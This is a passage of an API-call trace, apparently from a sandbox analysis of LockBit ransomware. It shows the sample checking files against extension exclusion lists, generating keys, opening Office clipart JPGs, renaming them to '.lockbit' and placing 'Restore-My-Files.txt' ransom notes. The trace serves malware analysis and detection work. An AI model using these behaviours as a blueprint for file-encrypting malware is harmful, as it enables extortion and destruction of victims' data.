lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.399] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.399] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.400] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.400] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.400] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG.lockbit") returned 72 [0160.400] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382954.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.401] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.401] malloc (_Size=0x40068) returned 0x3df0008 [0160.401] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=88703) returned 1 [0160.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.403] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.408] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.408] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.409] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.412] free (_Block=0x1fa2ed8) [0160.412] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.412] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.412] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.412] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x15fef, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382955.JPG", cAlternateFileName="")) returned 1 [0160.412] lstrcmpiW (lpString1=".", lpString2="J0382955.JPG") returned -1 [0160.412] lstrcmpiW (lpString1="..", lpString2="J0382955.JPG") returned -1 [0160.412] PathFindExtensionW (pszPath="J0382955.JPG") returned=".JPG" [0160.412] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.412] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.412] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.412] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.412] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.412] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.412] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.412] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.413] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.413] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382955.JPG") returned 1 [0160.414] lstrcmpiW (lpString1="ntldr", lpString2="J0382955.JPG") returned 1 [0160.414] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382955.JPG") returned 1 [0160.414] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382955.JPG") returned -1 [0160.414] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382955.JPG") returned -1 [0160.414] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382955.JPG") returned 1 [0160.414] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382955.JPG") returned -1 [0160.414] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.414] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG") returned=".JPG" [0160.414] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.414] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.414] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.415] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.415] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.415] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG.lockbit") returned 72 [0160.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382955.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.416] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.417] malloc (_Size=0x40068) returned 0x3df0008 [0160.417] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=90095) returned 1 [0160.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.418] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.425] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.425] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.425] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.427] free (_Block=0x1fa2ed8) [0160.427] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.427] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.427] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.427] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661d4d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1a9ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382957.JPG", cAlternateFileName="")) returned 1 [0160.427] lstrcmpiW (lpString1=".", lpString2="J0382957.JPG") returned -1 [0160.427] lstrcmpiW (lpString1="..", lpString2="J0382957.JPG") returned -1 [0160.427] PathFindExtensionW (pszPath="J0382957.JPG") returned=".JPG" [0160.427] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.427] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.427] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.427] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.428] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.428] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.429] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.429] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382957.JPG") returned 1 [0160.429] lstrcmpiW (lpString1="ntldr", lpString2="J0382957.JPG") returned 1 [0160.429] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382957.JPG") returned 1 [0160.429] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382957.JPG") returned -1 [0160.429] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382957.JPG") returned -1 [0160.430] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382957.JPG") returned 1 [0160.430] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382957.JPG") returned -1 [0160.430] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.430] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG") returned=".JPG" [0160.430] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.430] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.430] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.430] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.430] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.430] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.430] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.431] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.431] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG.lockbit") returned 72 [0160.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382957.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.432] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.432] malloc (_Size=0x40068) returned 0x3df0008 [0160.432] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=109037) returned 1 [0160.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.434] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.440] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.440] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0160.440] free (_Block=0x1fa2ed8) [0160.440] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.440] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.440] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661d4d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x193e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382958.JPG", cAlternateFileName="")) returned 1 [0160.440] lstrcmpiW (lpString1=".", lpString2="J0382958.JPG") returned -1 [0160.441] lstrcmpiW (lpString1="..", lpString2="J0382958.JPG") returned -1 [0160.441] PathFindExtensionW (pszPath="J0382958.JPG") returned=".JPG" [0160.441] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.441] 